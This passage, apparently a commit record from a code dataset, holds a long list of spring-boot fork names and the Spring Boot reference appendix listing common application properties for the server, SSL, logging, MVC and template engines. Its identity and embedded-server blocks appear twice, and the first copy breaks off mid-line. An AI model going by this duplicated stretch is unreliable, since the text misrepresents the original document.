oot,ApiSecRay\/spring-boot,eric-stanley\/spring-boot,qerub\/spring-boot,RichardCSantana\/spring-boot,frost2014\/spring-boot,M3lkior\/spring-boot,marcellodesales\/spring-boot,mbnshankar\/spring-boot,jxblum\/spring-boot,designreuse\/spring-boot,jack-luj\/spring-boot,frost2014\/spring-boot,soul2zimate\/spring-boot,ojacquemart\/spring-boot,mbogoevici\/spring-boot,rweisleder\/spring-boot,mabernardo\/spring-boot,clarklj001\/spring-boot,i007422\/jenkins2-course-spring-boot,nurkiewicz\/spring-boot,trecloux\/spring-boot,eliudiaz\/spring-boot,MrMitchellMoore\/spring-boot,ameraljovic\/spring-boot,royclarkson\/spring-boot,lburgazzoli\/spring-boot,drunklite\/spring-boot,orangesdk\/spring-boot,donhuvy\/spring-boot,rizwan18\/spring-boot,jeremiahmarks\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,allyjunio\/spring-boot,ilayaperumalg\/sp
ring-boot,playleud\/spring-boot,tbadie\/spring-boot,lucassaldanha\/spring-boot,ollie314\/spring-boot,philwebb\/spring-boot,okba1\/spring-boot,vakninr\/spring-boot,mosen11\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,ojacquemart\/spring-boot,thomasdarimont\/spring-boot,wilkinsona\/spring-boot,lburgazzoli\/spring-boot,mosen11\/spring-boot,duandf35\/spring-boot,eddumelendez\/spring-boot,ChunPIG\/spring-boot,axibase\/spring-boot,buobao\/spring-boot,trecloux\/spring-boot,Buzzardo\/spring-boot,rweisleder\/spring-boot,hello2009chen\/spring-boot,sungha\/spring-boot,keithsjohnson\/spring-boot,huangyugui\/spring-boot,roberthafner\/spring-boot,keithsjohnson\/spring-boot,npcode\/spring-boot,philwebb\/spring-boot-concourse,mouadtk\/spring-boot,drumonii\/spring-boot,mbnshankar\/spring-boot,tsachev\/spring-boot,prasenjit-net\/spring-boot,xingguang2013\/spring-boot,AstaTus\/spring-boot,dreis2211\/spring-boot,donthadineshkumar\/spring-boot,lif123\/spring-boot,mabernardo\/spring-boot,xialeizhou\/spring-boot,JiweiWong\/spring-boot,isopov\/spring-boot,simonnordberg\/spring-boot,eliudiaz\/spring-boot,smayoorans\/spring-boot,joshthornhill\/spring-boot,herau\/spring-boot,RainPlanter\/spring-boot,lucassaldanha\/spring-boot,minmay\/spring-boot,ydsakyclguozi\/spring-boot,tbadie\/spring-boot,ptahchiev\/spring-boot,ydsakyclguozi\/spring-boot,simonnordberg\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,damoyang\/spring-boot,eric-stanley\/spring-boot,simonnordberg\/spring-boot,qq83387856\/spring-boot,deki\/spring-boot,mdeinum\/spring-boot,gauravbrills\/spring-boot,lokbun\/spring-boot,drunklite\/spring-boot,srikalyan\/spring-boot,hehuabing\/spring-boot,jbovet\/spring-boot,nisuhw\/spring-boot,hklv\/spring-boot,aahlenst\/spring-boot,zhanhb\/spring-boot,philwebb\/spring-boot,M3lkior\/spring-boot,peteyan\/spring-boot,wwadge\/spring-boot,AngusZhu\/spring-boot,eonezhang\/spring-boot,sbcoba\/spring-boot,ApiSecRay\/spring-boot,kamilszymanski\/spring-boot,jjankar\/spring-boot,mlc0202\/spring-boot,mackeprm\/spring-boot,hklv\/spring-boot,rizwan18\/spring-boot,olivergierke\/spring-boot,htynkn\/spring-boot,eric-stanley\/spring-boot,mdeinum\/spring-boot,sbcoba\/spring-boot,jforge\/spring-boot,soul2zimate\/spring-boot,eonezhang\/spring-boot,lif123\/spring-boot,jcastaldoFoodEssentials\/spring-boot,crackien\/spring-boot,jayarampradhan\/spring-boot,RishikeshDarandale\/spring-boot,isopov\/spring-boot,rams2588\/spring-boot,SaravananParthasarathy\/SPSDemo,nebhale\/spring-boot,pvorb\/spring-boot,javyzheng\/spring-boot,mbrukman\/spring-boot,balajinsr\/spring-boot,lcardito\/spring-boot,yangdd1205\/spring-boot,sbcoba\/spring-boot,rstirling\/spring-boot,RichardCSantana\/spring-boot,ractive\/spring-boot,Chomeh\/spring-boot,prasenjit-net\/spring-boot,Buzzardo\/spring-boot,na-na\/spring-boot,ApiSecRay\/spring-boot,marcellodesales\/spring-boot,fjlopez\/spring-boot,ptahchiev\/spring-boot,rmoorman\/spring-boot,deki\/spring-boot,neo4j-contrib\/spring-boot,johnktims\/spring-boot,roberthafner\/spring-boot,huangyugui\/spring-boot,pnambiarsf\/spring-boot,zhanhb\/spring-boot,jayarampradhan\/spring-boot,NetoDevel\/spring-boot,navarrogabriela\/spring-boot,lburgazzoli\/spring-boot,royclarkson\/spring-boot,lcardito\/spring-boot,patrikbeno\/spring-boot,fulvio-m\/spring-boot,fjlopez\/spring-boot,rstirling\/spring-boot,joansmith\/spring-boot,zorosteven\/spring-boot,VitDevelop\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,srinivasan01\/spring-boot,navarrogabriela\/spring-boot,nandakishorm\/spring-boot,prasenjit-net\/spring-boot,jeremiahma
rks\/spring-boot,smilence1986\/spring-boot,hqrt\/jenkins2-course-spring-boot,jxblum\/spring-boot,royclarkson\/spring-boot,kdvolder\/spring-boot,imranansari\/spring-boot,zhangshuangquan\/spring-root,5zzang\/spring-boot,srinivasan01\/spring-boot,ihoneymon\/spring-boot,nevenc-pivotal\/spring-boot,bijukunjummen\/spring-boot,izeye\/spring-boot,jforge\/spring-boot,drumonii\/spring-boot,yunbian\/spring-boot,axelfontaine\/spring-boot,linead\/spring-boot,spring-projects\/spring-boot,tiarebalbi\/spring-boot,nghialunhaiha\/spring-boot,VitDevelop\/spring-boot,joshiste\/spring-boot,zhanhb\/spring-boot,dnsw83\/spring-boot,akmaharshi\/jenkins,allyjunio\/spring-boot,Pokbab\/spring-boot,satheeshmb\/spring-boot,bclozel\/spring-boot,eonezhang\/spring-boot,lucassaldanha\/spring-boot,drumonii\/spring-boot,frost2014\/spring-boot,trecloux\/spring-boot,donthadineshkumar\/spring-boot,lucassaldanha\/spring-boot,candrews\/spring-boot,drumonii\/spring-boot,lingounet\/spring-boot,mlc0202\/spring-boot,hklv\/spring-boot,nurkiewicz\/spring-boot,eddumelendez\/spring-boot,zorosteven\/spring-boot,sebastiankirsch\/spring-boot,fireshort\/spring-boot,mbogoevici\/spring-boot,donthadineshkumar\/spring-boot,bijukunjummen\/spring-boot,mbrukman\/spring-boot,lcardito\/spring-boot,tiarebalbi\/spring-boot,durai145\/spring-boot,xiaoleiPENG\/my-project,M3lkior\/spring-boot,lenicliu\/spring-boot,mosoft521\/spring-boot,joshthornhill\/spring-boot,jack-luj\/spring-boot,lenicliu\/spring-boot,lokbun\/spring-boot,rmoorman\/spring-boot,bjornlindstrom\/spring-boot,mbenson\/spring-boot,wilkinsona\/spring-boot,rstirling\/spring-boot,jcastaldoFoodEssentials\/spring-boot,christian-posta\/spring-boot,rweisleder\/spring-boot,qerub\/spring-boot,soul2zimate\/spring-boot,ilayaperumalg\/spring-boot,herau\/spring-boot,dnsw83\/spring-boot,okba1\/spring-boot,fireshort\/spring-boot,ilayaperumalg\/spring-boot,axibase\/spring-boot,brettwooldridge\/spring-boot,ptahchiev\/spring-boot,paddymahoney\/spring-boot,na-na\/spring-boot,designreuse\/spring-boot,kiranbpatil\/spring-boot,sbuettner\/spring-boot,habuma\/spring-boot,murilobr\/spring-boot,jcastaldoFoodEssentials\/spring-boot,fulvio-m\/spring-boot,felipeg48\/spring-boot,pvorb\/spring-boot,patrikbeno\/spring-boot,scottfrederick\/spring-boot,AstaTus\/spring-boot,srikalyan\/spring-boot,mackeprm\/spring-boot,pnambiarsf\/spring-boot,ChunPIG\/spring-boot,JiweiWong\/spring-boot,lenicliu\/spring-boot,ChunPIG\/spring-boot,xc145214\/spring-boot,rams2588\/spring-boot,hello2009chen\/spring-boot,NetoDevel\/spring-boot,DONIKAN\/spring-boot,deki\/spring-boot,afroje-reshma\/spring-boot-sample,nandakishorm\/spring-boot,joshiste\/spring-boot,rweisleder\/spring-boot,brettwooldridge\/spring-boot,roymanish\/spring-boot,shakuzen\/spring-boot,navarrogabriela\/spring-boot,duandf35\/spring-boot,RobertNickens\/spring-boot,vpavic\/spring-boot,ihoneymon\/spring-boot,RainPlanter\/spring-boot,mebinjacob\/spring-boot,vpavic\/spring-boot,philwebb\/spring-boot-concourse,mohican0607\/spring-boot,auvik\/spring-boot,imranansari\/spring-boot,sebastiankirsch\/spring-boot,fogone\/spring-boot,michael-simons\/spring-boot,kiranbpatil\/spring-boot,DONIKAN\/spring-boot,izeye\/spring-boot,jcastaldoFoodEssentials\/spring-boot,tsachev\/spring-boot,hklv\/spring-boot,michael-simons\/spring-boot,vpavic\/spring-boot,sungha\/spring-boot,zhangshuangquan\/spring-root,javyzheng\/spring-boot,akmaharshi\/jenkins,mouadtk\/spring-boot,MrMitchellMoore\/spring-boot,mbenson\/spring-boot,mackeprm\/spring-boot,gauravbrills\/spring-boot,frost2014\/spring-boot,Chomeh\/spring-bo
ot,vakninr\/spring-boot,philwebb\/spring-boot-concourse,srikalyan\/spring-boot,michael-simons\/spring-boot,nelswadycki\/spring-boot,mdeinum\/spring-boot,DONIKAN\/spring-boot,spring-projects\/spring-boot,yhj630520\/spring-boot,mlc0202\/spring-boot,roberthafner\/spring-boot,marcellodesales\/spring-boot,yuxiaole\/spring-boot,christian-posta\/spring-boot,xialeizhou\/spring-boot,bjornlindstrom\/spring-boot,ralenmandao\/spring-boot,mbogoevici\/spring-boot,existmaster\/spring-boot,playleud\/spring-boot,forestqqqq\/spring-boot,qerub\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,DONIKAN\/spring-boot,smilence1986\/spring-boot,felipeg48\/spring-boot,paddymahoney\/spring-boot,raiamber1\/spring-boot,afroje-reshma\/spring-boot-sample,mrumpf\/spring-boot,Chomeh\/spring-boot,AngusZhu\/spring-boot,jeremiahmarks\/spring-boot,eric-stanley\/spring-boot,i007422\/jenkins2-course-spring-boot,vakninr\/spring-boot,bclozel\/spring-boot,designreuse\/spring-boot,xialeizhou\/spring-boot,bjornlindstrom\/spring-boot,npcode\/spring-boot,forestqqqq\/spring-boot,xc145214\/spring-boot,javyzheng\/spring-boot,AngusZhu\/spring-boot,jforge\/spring-boot,jjankar\/spring-boot,zhanhb\/spring-boot,tbadie\/spring-boot,mike-kukla\/spring-boot,ptahchiev\/spring-boot,javyzheng\/spring-boot,lenicliu\/spring-boot,RainPlanter\/spring-boot,yunbian\/spring-boot,zorosteven\/spring-boot,rickeysu\/spring-boot,jayarampradhan\/spring-boot,jayeshmuralidharan\/spring-boot,prasenjit-net\/spring-boot,Buzzardo\/spring-boot,auvik\/spring-boot,vpavic\/spring-boot,jack-luj\/spring-boot,mrumpf\/spring-boot,kayelau\/spring-boot,meftaul\/spring-boot,xiaoleiPENG\/my-project,linead\/spring-boot,wilkinsona\/spring-boot,shakuzen\/spring-boot,buobao\/spring-boot,auvik\/spring-boot,meftaul\/spring-boot,lenicliu\/spring-boot,meloncocoo\/spring-boot,axelfontaine\/spring-boot,nevenc-pivotal\/spring-boot,ChunPIG\/spring-boot,Charkui\/spring-boot,jmnarloch\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,ydsakyclguozi\/spring-boot,philwebb\/spring-boot-concourse,rams2588\/spring-boot,rweisleder\/spring-boot,na-na\/spring-boot,DONIKAN\/spring-boot,mbnshankar\/spring-boot,mosen11\/spring-boot,shakuzen\/spring-boot,krmcbride\/spring-boot,wilkinsona\/spring-boot,ihoneymon\/spring-boot,mdeinum\/spring-boot,mosen11\/spring-boot,xdweleven\/spring-boot,JiweiWong\/spring-boot,cbtpro\/spring-boot,sebastiankirsch\/spring-boot,meloncocoo\/spring-boot,tbbost\/spring-boot,pnambiarsf\/spring-boot,jvz\/spring-boot,meftaul\/spring-boot,lucassaldanha\/spring-boot,peteyan\/spring-boot,mbenson\/spring-boot,kdvolder\/spring-boot,Nowheresly\/spring-boot,JiweiWong\/spring-boot,roymanish\/spring-boot,xiaoleiPENG\/my-project,joshiste\/spring-boot,cmsandiga\/spring-boot,imranansari\/spring-boot,master-slave\/spring-boot,mabernardo\/spring-boot,Charkui\/spring-boot,krmcbride\/spring-boot,rmoorman\/spring-boot,mohican0607\/spring-boot,habuma\/spring-boot,paddymahoney\/spring-boot,paweldolecinski\/spring-boot,prakashme\/spring-boot,ihoneymon\/spring-boot,Makhlab\/spring-boot,rams2588\/spring-boot,bclozel\/spring-boot,vaseemahmed01\/spring-boot,Nowheresly\/spring-boot,izeye\/spring-boot,fogone\/spring-boot,nandakishorm\/spring-boot,tbbost\/spring-boot,mackeprm\/spring-boot,hehuabing\/spring-boot,michael-simons\/spring-boot,PraveenkumarShethe\/spring-boot,Makhlab\/spring-boot,yunbian\/spring-boot,end-user\/spring-boot,Makhlab\/spring-boot,nandakishorm\/spring-boot,nevenc-pivotal\/spring-boot,trecloux\/spring-boot,eddumelendez\/spring-boot,pvorb\/spring-boot,yangdd1205\/spring-boot,buob
ao\/spring-boot,jjankar\/spring-boot,fogone\/spring-boot,eliudiaz\/spring-boot,wwadge\/spring-boot,jrrickard\/spring-boot,fireshort\/spring-boot,jxblum\/spring-boot,SPNilsen\/spring-boot,mdeinum\/spring-boot,RishikeshDarandale\/spring-boot,smilence1986\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/appendix-application-properties.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/appendix-application-properties.adoc","new_contents":":numbered!:\n[appendix]\n[[common-application-properties]]\n== Common application properties\nVarious properties can be specified inside your `application.properties`\/`application.yml`\nfile or as command line switches. This section provides a list common Spring Boot\nproperties and references to the underlying classes that consume them.\n\nNOTE: Property contributions can come from additional jar files on your classpath so\nyou should not consider this an exhaustive list. It is also perfectly legit to define\nyour own properties.\n\nWARNING: This sample file is meant as a guide only. Do **not** copy\/paste the entire\ncontent into your application; rather pick only the properties that you need.\n\n\n[source,properties,indent=0,subs=\"verbatim,attributes,macros\"]\n----\n\t# ===================================================================\n\t# COMMON SPRING BOOT PROPERTIES\n\t#\n\t# This sample file is provided as a guideline. Do NOT copy it in its\n\t# entirety to your own application. ^^^\n\t# ===================================================================\n\n\t# ----------------------------------------\n\t# CORE PROPERTIES\n\t# ----------------------------------------\n\n # BANNER\n banner.charset=UTF-8 # banner file encoding\n banner.location=classpath:banner.txt # banner file location\n\n\t# SPRING CONFIG ({sc-spring-boot}\/context\/config\/ConfigFileApplicationListener.{sc-ext}[ConfigFileApplicationListener])\n\tspring.config.name= # config file name (default to 'application')\n\tspring.config.location= # location of config file\n\n\t# PROFILES\n\tspring.profiles.active= # comma list of <<howto-set-active-spring-profiles,active profiles>>\n\tspring.profiles.include= # unconditionally activate the specified comma separated profiles\n\n\t# APPLICATION SETTINGS ({sc-spring-boot}\/SpringApplication.{sc-ext}[SpringApplication])\n\tspring.main.sources= # sources (class name, package name or XML resource location) to include\n\tspring.main.web-environment= # detect by default\n\tspring.main.show-banner=true\n\tspring.main....= # see class for all properties\n\n\t# ADMIN ({sc-spring-boot-autoconfigure}\/admin\/SpringApplicationAdminJmxAutoConfiguration.{sc-ext}[SpringApplicationAdminJmxAutoConfiguration])\n\tspring.application.admin.enabled=false # enable admin features for the application\n\tspring.application.admin.jmx-name=org.springframework.boot:type=Admin,name=SpringApplication # JMX name of the application admin MBean\n\n\t# OUTPUT\n\tspring.output.ansi.enabled=detect # Configure the ANSI output (\"detect\", \"always\", \"never\")\n\n\t# LOGGING\n\tlogging.path=\/var\/log\n\tlogging.file=myapp.log\n\tlogging.config= # location of config file (default classpath:logback.xml for logback)\n\tlogging.level.*= # levels for loggers, e.g. 
\"logging.level.org.springframework=DEBUG\" (TRACE, DEBUG, INFO, WARN, ERROR, FATAL, OFF)\n\n\t# IDENTITY ({sc-spring-boot}\/context\/ContextIdApplicationContextInitializer.{sc-ext}[ContextIdApplicationContextInitializer])\n\tspring.application.name=\n\tspring.application.index=\n\n\t# EMBEDDED SERVER CONFIGURATION ({sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[ServerProperties])\n\tserver.port=8080\n\tserver.address= # bind to a specific NIC\n\tserver.compression.enabled=false # if response compression is enabled\n\tserver.compression.mime-types=text\/html,text\/xml,text\/plain,text\/css # comma-separated list of MIME types that should be compressed\n\tserver.compression.min-response-size=2048 # minimum response size that is required for compression to be performed\n\tserver.context-parameters.*= # Servlet context init parameters, e.g. server.context-parameters.a=alpha\n\tserver.context-path= # the context path, defaults to '\/'\n\tserver.jsp-servlet.class-name=org.apache.jasper.servlet.JspServlet # The class name of the JSP servlet\n\tserver.jsp-servlet.init-parameters.*= # Init parameters used to configure the JSP servlet\n\tserver.jsp-servlet.registered=true # Whether or not the JSP servlet is registered\n\tserver.servlet-path= # the servlet path, defaults to '\/'\n\tserver.display-name= # the display name of the application\n\tserver.session.timeout= # session timeout in seconds\n\tserver.session.tracking-modes= # tracking modes (one or more of \"cookie\" ,\"url\", \"ssl\")\n\tserver.session.cookie.name= # session cookie name\n\tserver.session.cookie.domain= # domain for the session cookie\n\tserver.session.cookie.path= # path of the session cookie\n\tserver.session.cookie.comment= # comment for the session cookie\n\tserver.session.cookie.http-only= # \"HttpOnly\" flag for the session cookie\n\tserver.session.cookie.secure= # \"Secure\" flag for the session cookie\n\tserver.session.cookie.max-age= # maximum age of the session cookie in seconds\n\tserver.ssl.enabled=true # if SSL support is enabled\n\tserver.ssl.client-auth= # want or need\n\tserver.ssl.key-alias=\n\tserver.ssl.ciphers= # supported SSL ciphers\n\tserver.ssl.key-password=\n\tserver.ssl.key-store=\n\tserver.ssl.key-store-password=\n\tserver.ssl.key-store-provider=\n\tserver.ssl.key-store-type=\n\tserver.ssl.protocol=TLS\n\tserver.ssl.trust-store=\n\tserver.ssl.trust-store-password=\n\tserver.ssl.trust-store-provider=\n\tserver.ssl.trust-store-type=\n\tserver.tomcat.access-log-pattern= # log pattern of the access log\n\tserver.tomcat.access-log-enabled=false # is access logging enabled\n\tserver.tomcat.internal-proxies=10\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t169\\\\.254\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t127\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.1[6-9]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.2[0-9]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.3[0-1]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3} # regular expression matching trusted IP addresses\n\tserver.tomcat.protocol-header=x-forwarded-proto # front end proxy forward header\n\tserver.tomcat.protocol-header-https-value=https # value of the protocol header that indicates that the incoming request uses SSL\n\tserver.tomcat.port-header= # front end proxy port header\n\tserver.tomcat.remote-ip-header=x-forwarded-for\n\tserver.tomcat.basedir=\/tmp # base dir (usually not needed, defaults to tmp)\n\tserver.tomcat.background-processor-delay=30; # 
\n\n\t# IDENTITY ({sc-spring-boot}\/context\/ContextIdApplicationContextInitializer.{sc-ext}[ContextIdApplicationContextInitializer])\n\tspring.application.name=\n\tspring.application.index=\n\n\t# EMBEDDED SERVER CONFIGURATION ({sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[ServerProperties])\n\tserver.port=8080\n\tserver.address= # bind to a specific NIC\n\tserver.compression.enabled=false # if response compression is enabled\n\tserver.compression.mime-types=text\/html,text\/xml,text\/plain,text\/css # comma-separated list of MIME types that should be compressed\n\tserver.compression.min-response-size=2048 # minimum response size that is required for compression to be performed\n\tserver.context-parameters.*= # Servlet context init parameters, e.g. server.context-parameters.a=alpha\n\tserver.context-path= # the context path, defaults to '\/'\n\tserver.jsp-servlet.class-name=org.apache.jasper.servlet.JspServlet # The class name of the JSP servlet\n\tserver.jsp-servlet.init-parameters.*= # Init parameters used to configure the JSP servlet\n\tserver.jsp-servlet.registered=true # Whether or not the JSP servlet is registered\n\tserver.servlet-path= # the servlet path, defaults to '\/'\n\tserver.display-name= # the display name of the application\n\tserver.session.timeout= # session timeout in seconds\n\tserver.session.tracking-modes= # tracking modes (one or more of \"cookie\", \"url\", \"ssl\")\n\tserver.session.cookie.name= # session cookie name\n\tserver.session.cookie.domain= # domain for the session cookie\n\tserver.session.cookie.path= # path of the session cookie\n\tserver.session.cookie.comment= # comment for the session cookie\n\tserver.session.cookie.http-only= # \"HttpOnly\" flag for the session cookie\n\tserver.session.cookie.secure= # \"Secure\" flag for the session cookie\n\tserver.session.cookie.max-age= # maximum age of the session cookie in seconds\n\tserver.ssl.enabled=true # if SSL support is enabled\n\tserver.ssl.client-auth= # want or need\n\tserver.ssl.key-alias=\n\tserver.ssl.ciphers= # supported SSL ciphers\n\tserver.ssl.key-password=\n\tserver.ssl.key-store=\n\tserver.ssl.key-store-password=\n\tserver.ssl.key-store-provider=\n\tserver.ssl.key-store-type=\n\tserver.ssl.protocol=TLS\n\tserver.ssl.trust-store=\n\tserver.ssl.trust-store-password=\n\tserver.ssl.trust-store-provider=\n\tserver.ssl.trust-store-type=\n\tserver.tomcat.access-log-pattern= # log pattern of the access log\n\tserver.tomcat.access-log-enabled=false # is access logging enabled\n\tserver.tomcat.internal-proxies=10\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t169\\\\.254\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t127\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.1[6-9]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.2[0-9]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.3[0-1]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3} # regular expression matching trusted IP addresses\n\tserver.tomcat.protocol-header=x-forwarded-proto # front end proxy forward header\n\tserver.tomcat.protocol-header-https-value=https # value of the protocol header that indicates that the incoming request uses SSL\n\tserver.tomcat.port-header= # front end proxy port header\n\tserver.tomcat.remote-ip-header=x-forwarded-for\n\tserver.tomcat.basedir=\/tmp # base dir (usually not needed, defaults to tmp)\n\tserver.tomcat.background-processor-delay=30 # in seconds\n\tserver.tomcat.max-http-header-size= # maximum size in bytes of the HTTP message header\n\tserver.tomcat.max-threads=0 # number of threads in protocol handler\n\tserver.tomcat.uri-encoding=UTF-8 # character encoding to use for URL decoding\n\tserver.undertow.access-log-enabled=false # if access logging is enabled\n\tserver.undertow.access-log-pattern=common # log pattern of the access log\n\tserver.undertow.access-log-dir=logs # access logs directory\n\tserver.undertow.buffer-size= # size of each buffer in bytes\n    server.undertow.buffers-per-region= # number of buffers per region\n    server.undertow.direct-buffers=false # allocate buffers outside the Java heap\n    server.undertow.io-threads= # number of I\/O threads to create for the worker\n    server.undertow.worker-threads= # number of worker threads
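\n\n\t# For example, an HTTPS server on port 8443 with compression turned on\n\t# (the keystore location and password are placeholders):\n\t# server.port=8443\n\t# server.compression.enabled=true\n\t# server.ssl.key-store=classpath:keystore.jks\n\t# server.ssl.key-store-password=changeit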
\n\n\t# SPRING MVC ({sc-spring-boot-autoconfigure}\/web\/WebMvcProperties.{sc-ext}[WebMvcProperties])\n\tspring.mvc.locale= # set fixed locale, e.g. en_UK\n\tspring.mvc.date-format= # set fixed date format, e.g. dd\/MM\/yyyy\n\tspring.mvc.favicon.enabled=true\n\tspring.mvc.message-codes-resolver-format= # PREFIX_ERROR_CODE \/ POSTFIX_ERROR_CODE\n\tspring.mvc.ignore-default-model-on-redirect=true # if the content of the \"default\" model should be ignored during redirects\n\tspring.mvc.async.request-timeout= # async request timeout in milliseconds\n\tspring.mvc.view.prefix= # MVC view prefix\n\tspring.mvc.view.suffix= # ... and suffix\n\n\t# SPRING RESOURCES HANDLING ({sc-spring-boot-autoconfigure}\/web\/ResourceProperties.{sc-ext}[ResourceProperties])\n\tspring.resources.cache-period= # cache timeouts in headers sent to browser\n\tspring.resources.add-mappings=true # if default mappings should be added\n\tspring.resources.static-locations= # comma-separated list of the locations that serve static content (e.g. 'classpath:\/resources\/')\n\tspring.resources.chain.enabled=false # enable the Spring Resource Handling chain (enabled automatically if at least one strategy is enabled)\n\tspring.resources.chain.cache=false # enable in-memory caching of resource resolution\n\tspring.resources.chain.html-application-cache=false # enable HTML5 appcache manifest rewriting\n\tspring.resources.chain.strategy.content.enabled=false # enable a content version strategy\n\tspring.resources.chain.strategy.content.paths= # comma-separated list of regular expression patterns to apply the version strategy to\n\tspring.resources.chain.strategy.fixed.enabled=false # enable a fixed version strategy\n\tspring.resources.chain.strategy.fixed.paths= # comma-separated list of regular expression patterns to apply the version strategy to\n\tspring.resources.chain.strategy.fixed.version= # version string to use for this version strategy\n\n\t# MULTIPART ({sc-spring-boot-autoconfigure}\/web\/MultipartProperties.{sc-ext}[MultipartProperties])\n\tmultipart.enabled=true\n\tmultipart.file-size-threshold=0 # Threshold after which files will be written to disk.\n\tmultipart.location= # Intermediate location of uploaded files.\n\tmultipart.max-file-size=1Mb # Max file size.\n\tmultipart.max-request-size=10Mb # Max request size.\n\n\t# SPRING HATEOAS ({sc-spring-boot-autoconfigure}\/hateoas\/HateoasProperties.{sc-ext}[HateoasProperties])\n\tspring.hateoas.apply-to-primary-object-mapper=true # if the primary mapper should also be configured\n\n\t# HTTP encoding ({sc-spring-boot-autoconfigure}\/web\/HttpEncodingProperties.{sc-ext}[HttpEncodingProperties])\n\tspring.http.encoding.charset=UTF-8 # the encoding of HTTP requests\/responses\n\tspring.http.encoding.enabled=true # enable http encoding support\n\tspring.http.encoding.force=true # force the configured encoding\n\n\t# HTTP message conversion\n\tspring.http.converters.preferred-json-mapper= # the preferred JSON mapper to use for HTTP message conversion. Set to \"gson\" to force the use of Gson when both it and Jackson are on the classpath.\n\n\t# JACKSON ({sc-spring-boot-autoconfigure}\/jackson\/JacksonProperties.{sc-ext}[JacksonProperties])\n\tspring.jackson.date-format= # Date format string (e.g. yyyy-MM-dd HH:mm:ss), or a fully-qualified date format class name (e.g. com.fasterxml.jackson.databind.util.ISO8601DateFormat)\n\tspring.jackson.property-naming-strategy= # One of the constants on Jackson's PropertyNamingStrategy (e.g.
CAMEL_CASE_TO_LOWER_CASE_WITH_UNDERSCORES) or the fully-qualified class name of a PropertyNamingStrategy subclass\n\tspring.jackson.deserialization.*= # see Jackson's DeserializationFeature\n\tspring.jackson.generator.*= # see Jackson's JsonGenerator.Feature\n\tspring.jackson.joda-date-time-format= # Joda date time format string\n\tspring.jackson.mapper.*= # see Jackson's MapperFeature\n\tspring.jackson.parser.*= # see Jackson's JsonParser.Feature\n\tspring.jackson.serialization.*= # see Jackson's SerializationFeature\n\tspring.jackson.serialization-inclusion= # Controls the inclusion of properties during serialization (see Jackson's JsonInclude.Include)\n\n\t# THYMELEAF ({sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[ThymeleafAutoConfiguration])\n\tspring.thymeleaf.check-template-location=true\n\tspring.thymeleaf.prefix=classpath:\/templates\/\n\tspring.thymeleaf.excluded-view-names= # comma-separated list of view names that should be excluded from resolution\n\tspring.thymeleaf.view-names= # comma-separated list of view names that can be resolved\n\tspring.thymeleaf.suffix=.html\n\tspring.thymeleaf.mode=HTML5\n\tspring.thymeleaf.enabled=true # enable MVC view resolution\n\tspring.thymeleaf.encoding=UTF-8\n\tspring.thymeleaf.content-type=text\/html # ;charset=<encoding> is added\n\tspring.thymeleaf.cache=true # set to false for hot refresh\n\n\t# FREEMARKER ({sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[FreeMarkerAutoConfiguration])\n\tspring.freemarker.allow-request-override=false\n\tspring.freemarker.cache=true\n\tspring.freemarker.check-template-location=true\n\tspring.freemarker.charset=UTF-8\n\tspring.freemarker.content-type=text\/html\n\tspring.freemarker.enabled=true # enable MVC view resolution\n\tspring.freemarker.expose-request-attributes=false\n\tspring.freemarker.expose-session-attributes=false\n\tspring.freemarker.expose-spring-macro-helpers=false\n\tspring.freemarker.prefix=\n\tspring.freemarker.prefer-file-system-access=true # prefer file system access for template loading\n\tspring.freemarker.request-context-attribute=\n\tspring.freemarker.settings.*=\n\tspring.freemarker.suffix=.ftl\n\tspring.freemarker.template-loader-path=classpath:\/templates\/ # comma-separated list\n\tspring.freemarker.view-names= # whitelist of view names that can be resolved\n\n\t# GROOVY TEMPLATES ({sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[GroovyTemplateAutoConfiguration])\n\tspring.groovy.template.cache=true\n\tspring.groovy.template.charset=UTF-8\n\tspring.groovy.template.check-template-location=true # check that the templates location exists\n\tspring.groovy.template.configuration.*= # See GroovyMarkupConfigurer\n\tspring.groovy.template.content-type=text\/html\n\tspring.groovy.template.enabled=true # enable MVC view resolution\n\tspring.groovy.template.prefix=\n\tspring.groovy.template.resource-loader-path=classpath:\/templates\/\n spring.groovy.template.suffix=.tpl\n\tspring.groovy.template.view-names= # whitelist of view names that can be resolved\n\n\t# VELOCITY TEMPLATES 